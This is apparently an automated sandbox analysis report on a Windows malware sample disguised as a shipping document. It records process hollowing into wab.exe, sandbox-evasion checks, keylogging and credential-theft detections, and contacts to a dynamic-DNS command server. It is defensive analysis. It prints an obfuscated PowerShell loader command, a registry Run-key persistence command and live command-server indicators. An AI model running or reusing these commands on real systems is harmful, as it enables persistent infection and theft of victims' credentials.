              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX (76 identical entries)
              Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX (5 identical entries)
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 6361
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 3474
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; Window / User API: threadDelayed 2194
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6448; Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7052; Thread sleep count: 2194 > 30
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; Last function: Thread delayed (2 identical entries)
              Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; Thread sleep count: Count: 2194 delay: -5
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe; Code function: 0_2_004069DF FindFirstFileW,FindClose, 0_2_004069DF
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe; Code function: 0_2_00405D8E CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405D8E
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe; Code function: 0_2_00402910 FindFirstFileW, 0_2_00402910
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user\AppData\Roaming\brosy\
              Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user\AppData\Roaming\brosy\udrulnings\
              Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user\AppData\
              Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user\AppData\Roaming\
              Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\
              Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user\
              Source: Amcache.hve.18.dr; Binary or memory string: VMware
              Source: wab.exe, 00000007.00000002.2877594254.000000000550B000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAWx
              Source: Amcache.hve.18.dr; Binary or memory string: VMware Virtual USB Mouse
              Source: Amcache.hve.18.dr; Binary or memory string: vmci.syshbin
              Source: Amcache.hve.18.dr; Binary or memory string: VMware, Inc.
              Source: Amcache.hve.18.dr; Binary or memory string: VMware20,1hbin@
              Source: Amcache.hve.18.dr; Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
              Source: Amcache.hve.18.dr; Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
              Source: Amcache.hve.18.dr; Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
              Source: wab.exe, 00000007.00000002.2877594254.0000000005567000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.2877594254.0000000005548000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW
              Source: Amcache.hve.18.dr; Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
              Source: Amcache.hve.18.dr; Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
              Source: Amcache.hve.18.dr; Binary or memory string: c:/windows/system32/drivers/vmci.sys
              Source: Amcache.hve.18.dr; Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
              Source: Amcache.hve.18.dr; Binary or memory string: vmci.sys
              Source: Amcache.hve.18.dr; Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
              Source: Amcache.hve.18.dr; Binary or memory string: vmci.syshbin`
              Source: Amcache.hve.18.dr; Binary or memory string: \driver\vmci,\driver\pci
              Source: Amcache.hve.18.dr; Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
              Source: Amcache.hve.18.dr; Binary or memory string: VMware20,1
              Source: Amcache.hve.18.dr; Binary or memory string: Microsoft Hyper-V Generation Counter
              Source: Amcache.hve.18.dr; Binary or memory string: NECVMWar VMware SATA CD00
              Source: Amcache.hve.18.dr; Binary or memory string: VMware Virtual disk SCSI Disk Device
              Source: Amcache.hve.18.dr; Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
              Source: Amcache.hve.18.dr; Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
              Source: Amcache.hve.18.dr; Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
              Source: Amcache.hve.18.dr; Binary or memory string: VMware PCI VMCI Bus Device
              Source: Amcache.hve.18.dr; Binary or memory string: VMware VMCI Bus Device
              Source: Amcache.hve.18.dr; Binary or memory string: VMware Virtual RAM
              Source: Amcache.hve.18.dr; Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
              Source: Amcache.hve.18.dr; Binary or memory string: vmci.inf_amd64_68ed49469341f563
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe; API call chain: ExitProcess graph end node; graph_0-3605
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe; API call chain: ExitProcess graph end node; graph_0-3600
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process information queried: ProcessInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process queried: DebugPort
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; Process queried: DebugPort (25 identical entries)
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process token adjusted: Debug

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Program Files (x86)\Windows Mail\wab.exe; Section loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write (11 identical entries)
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; Section loaded: NULL target: C:\Windows\SysWOW64\reg.exe protection: execute and read and write
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; Section loaded: NULL target: unknown protection: execute and read and write (18 identical entries)
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; Section unmapped: unknown base address: 400000 (11 identical entries)
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3E60000
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 293F958
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Unthematic" /t REG_EXPAND_SZ /d "%Scrippage% -windowstyle minimized $Raquette=(Get-ItemProperty -Path 'HKCU:\kvidret\').Unemancipated;%Scrippage% ($Raquette)"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\sreexoebkgcaarsayfwsrzyyowbcnlfz"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\dtkx"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\fnphyzzx"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\xtjcxb"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\hvonqtlzm"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\sptgqmvszidsb"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\zaaaovlz"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\juftpowalcj"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\mxslqghuzktmmh"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\dceyoihckfacn" (4 identical entries)
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\owkrpbswynspxwny"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Unthematic" /t REG_EXPAND_SZ /d "%Scrippage% -windowstyle minimized $Raquette=(Get-ItemProperty -Path 'HKCU:\kvidret\').Unemancipated;%Scrippage% ($Raquette)"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; Process created: unknown unknown (21 identical entries)
              Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Unthematic" /t REG_EXPAND_SZ /d "%Scrippage% -windowstyle minimized $Raquette=(Get-ItemProperty -Path 'HKCU:\kvidret\').Unemancipated;%Scrippage% ($Raquette)"
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$respireredes=get-content 'c:\users\user\appdata\roaming\brosy\udrulnings\depravingly238\glathvls\rotorklipper\ergotoxine\oxaloacetic.arc';$brikvvningernes=$respireredes.substring(58067,3);.$brikvvningernes($respireredes)" (2 identical entries)
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "unthematic" /t reg_expand_sz /d "%scrippage% -windowstyle minimized $raquette=(get-itemproperty -path 'hkcu:\kvidret\').unemancipated;%scrippage% ($raquette)" (2 identical entries)
              Source: wab.exe, 00000007.00000002.2877594254.0000000005567000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Program ManagerlesW
              Source: wab.exe, 00000007.00000002.2877594254.0000000005567000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Program ManagerdiR
              Source: wab.exe, 00000007.00000002.2877594254.0000000005567000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.2216916264.0000000005579000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.2216886592.0000000005575000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Program Managernet/
              Source: wab.exe, 00000007.00000002.2877594254.0000000005567000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Program Managerles
              Source: wab.exe, 00000007.00000002.2877594254.0000000005567000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.2216916264.0000000005579000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.2216886592.0000000005575000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: |Program Manager|
              Source: wab.exe, 00000007.00000002.2877594254.0000000005567000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Program Managery
              Source: wab.exe, 00000007.00000002.2877594254.0000000005567000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.2216916264.0000000005579000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.2216886592.0000000005575000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: [Program Manager]
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe | Code function: 0_2_00403645 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess | 0_2_00403645
Source: Amcache.hve.18.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.18.dr | Binary or memory string: msmpeng.exe
Source: Amcache.hve.18.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.18.dr | Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Source: Yara match | File source: 00000007.00000002.2877594254.0000000005567000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000003.2216916264.0000000005579000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000003.2216886592.0000000005575000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: wab.exe PID: 6544, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Roaming\fvberms.dat, type: DROPPED

Remote Access Functionality

Source: Yara match | File source: 00000007.00000002.2877594254.0000000005567000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000003.2216916264.0000000005579000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000003.2216886592.0000000005575000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: wab.exe PID: 6544, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Roaming\fvberms.dat, type: DROPPED
MITRE ATT&CK Matrix (techniques listed per tactic; the number in parentheses is the hit count shown in the matrix cell, cells without a count had no hits)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: Windows Management Instrumentation (1); Shared Modules (1); Command and Scripting Interpreter (21); PowerShell (2); Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: DLL Side-Loading (1); Registry Run Keys / Startup Folder (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: DLL Side-Loading (1); Access Token Manipulation (1); Process Injection (312); Registry Run Keys / Startup Folder (1); Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Defense Evasion: Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (1); Software Packing (1); DLL Side-Loading (1); Masquerading (11); Modify Registry (1); Virtualization/Sandbox Evasion (41); Access Token Manipulation (1); Process Injection (312)
Credential Access: Input Capture (11); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: File and Directory Discovery (3); System Information Discovery (14); Security Software Discovery (121); Process Discovery (2); Virtualization/Sandbox Evasion (41); Application Window Discovery (1); Remote System Discovery; System Owner/User Discovery; Network Sniffing
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: Archive Collected Data (1); Input Capture (11); Clipboard Data (1); Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: Ingress Tool Transfer (1); Encrypted Channel (11); Non-Standard Port (1); Non-Application Layer Protocol (2); Application Layer Protocol (213); Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Behavior Graph ID: 1435835 | Sample: 586 R1 M-LINE - GEORGIA 03.05.2024.exe | Start date: 03/05/2024 | Architecture: WINDOWS | Score: 100

Behavior graph as a process tree (the number after a process name is the count shown next to it in the graph; network, file and signature nodes are listed under the process they are attached to):

• Start
  DNS/IP: learfo55ozj02.duckdns.org; geoplugin.net; enelltd.top
  Signatures: Snort IDS alert for network traffic; Found malware configuration; Antivirus detection for URL or domain; 8 other signatures; Uses dynamic DNS services (learfo55ozj02.duckdns.org)
  • 586 R1 M-LINE - GEORGIA 03.05.2024.exe 37 (started)
    Dropped: C:\Users\user\AppData\...\Oxaloacetic.Arc, ASCII
    Signatures: Suspicious powershell command line found
    • powershell.exe 20 (started)
      Dropped: 586 R1 M-LINE - GEORGIA 03.05.2024.exe, PE32
      Signatures: Obfuscated command line found; Writes to foreign memory regions; Found suspicious powershell code related to unpacking or dynamic code loading; Powershell drops PE file
      • wab.exe 5 15 (started)
        DNS/IP: learfo55ozj02.duckdns.org 193.222.96.21, ports 29871, 49739, 49740, SWISSCOMSwisscomSwitzerlandLtdCH, Germany; enelltd.top 172.67.215.46, ports 443, 49738, CLOUDFLARENETUS, United States; geoplugin.net 178.237.33.50, ports 49741, 80, ATOM86-ASATOM86NL, Netherlands
        Dropped: C:\Users\user\AppData\Roaming\fvberms.dat, data
        Signatures: Uses cmd line tools excessively to alter registry or file data; Maps a DLL or memory area into another process; Sample uses process hollowing technique; Installs a global keyboard hook
        • cmd.exe 1 (started)
          Signatures: Uses cmd line tools excessively to alter registry or file data
          • conhost.exe (started)
          • reg.exe 1 1 (started)
        • wab.exe (started)
          • WerFault.exe 18 (started)
        • wab.exe (started)
          • WerFault.exe 22 18 (started)
        • 13 other processes
          • WerFault.exe 18 (started)
          • WerFault.exe 18 (started)
          • WerFault.exe (started)
          • 2 other processes
      • cmd.exe 1 (started)
      • conhost.exe (started)

Antivirus, Machine Learning and Genetic Malware Detection

Initial sample (Source | Detection | Scanner | Label):
586 R1 M-LINE - GEORGIA 03.05.2024.exe | 14% | Virustotal |

Dropped files (Source | Detection | Scanner | Label):
C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Fugendes151\586 R1 M-LINE - GEORGIA 03.05.2024.exe | 11% | ReversingLabs |
C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Fugendes151\586 R1 M-LINE - GEORGIA 03.05.2024.exe | 14% | Virustotal |

Unpacked PE files: No Antivirus matches

Domains (Source | Detection | Scanner | Label):
learfo55ozj02.duckdns.org | 1% | Virustotal |
enelltd.top | 4% | Virustotal |
geoplugin.net | 4% | Virustotal |

URLs (Source | Detection | Scanner | Label):
http://geoplugin.net/json.gp | 100% | URL Reputation | phishing
http://crl.micro | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 100% | URL Reputation | malware
https://contoso.com/ | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
http://geoplugin.net/json.gpf | 0% | Avira URL Cloud | safe
http://geoplugin.net/ | 0% | Avira URL Cloud | safe
https://enelltd.top/ | 0% | Avira URL Cloud | safe
learfo55ozj02.duckdns.org | 0% | Avira URL Cloud | safe
http://geoplugin.net/json.gpm | 0% | Avira URL Cloud | safe
http://geoplugin.net/ | 4% | Virustotal |
learfo55ozj02.duckdns.org | 1% | Virustotal |
http://geoplugin.net/json.gpm | 0% | Virustotal |
http://geoplugin.net/json.gpf | 0% | Virustotal |
https://enelltd.top/ | 0% | Virustotal |
Contacted domains (Name | IP | Active | Malicious | Antivirus Detection | Reputation):
learfo55ozj02.duckdns.org | 193.222.96.21 | true | true | | unknown
enelltd.top | 172.67.215.46 | true | false | | unknown
geoplugin.net | 178.237.33.50 | true | false | | unknown
Contacted URLs (Name | Malicious | Antivirus Detection | Reputation):
http://geoplugin.net/json.gp | true | URL Reputation: phishing | unknown
learfo55ozj02.duckdns.org | true | 1%, Virustotal; Avira URL Cloud: safe | unknown
URLs from memory and binaries (Name | Source | Malicious | Antivirus Detection | Reputation):
https://enelltd.top/ | wab.exe, 00000007.00000002.2877594254.0000000005548000.00000004.00000020.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
http://nuget.org/NuGet.exe | powershell.exe, 00000001.00000002.2196989901.0000000005AF9000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://geoplugin.net/json.gpf | wab.exe, 00000007.00000002.2877594254.0000000005567000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.2216916264.0000000005579000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.2216886592.0000000005575000.00000004.00000020.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
http://crl.micro | powershell.exe, 00000001.00000002.2193750847.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://geoplugin.net/ | wab.exe, 00000007.00000003.2216916264.0000000005579000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.2216886592.0000000005575000.00000004.00000020.00020000.00000000.sdmp | false | 4%, Virustotal; Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000001.00000002.2194433332.0000000004BE6000.00000004.00000800.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000001.00000002.2194433332.0000000004BE6000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/ | powershell.exe, 00000001.00000002.2196989901.0000000005AF9000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000001.00000002.2196989901.0000000005AF9000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 00000001.00000002.2196989901.0000000005AF9000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://geoplugin.net/json.gpm | wab.exe, 00000007.00000002.2877594254.0000000005567000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.2216916264.0000000005579000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.2216886592.0000000005575000.00000004.00000020.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000001.00000002.2196989901.0000000005AF9000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://upx.sf.net | Amcache.hve.18.dr | false | | high
https://aka.ms/pscore6lBkq | powershell.exe, 00000001.00000002.2194433332.0000000004A91000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://nsis.sf.net/NSIS_ErrorError | 586 R1 M-LINE - GEORGIA 03.05.2024.exe, 586 R1 M-LINE - GEORGIA 03.05.2024.exe.1.dr | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000001.00000002.2194433332.0000000004A91000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 00000001.00000002.2194433332.0000000004BE6000.00000004.00000800.00020000.00000000.sdmp | false | | high
Contacted IPs (IP | Domain | Country | ASN | ASN Name | Malicious):
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
172.67.215.46 | enelltd.top | United States | 13335 | CLOUDFLARENETUS | false
193.222.96.21 | learfo55ozj02.duckdns.org | Germany | 3303 | SWISSCOMSwisscomSwitzerlandLtdCH | true
General Information

Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1435835
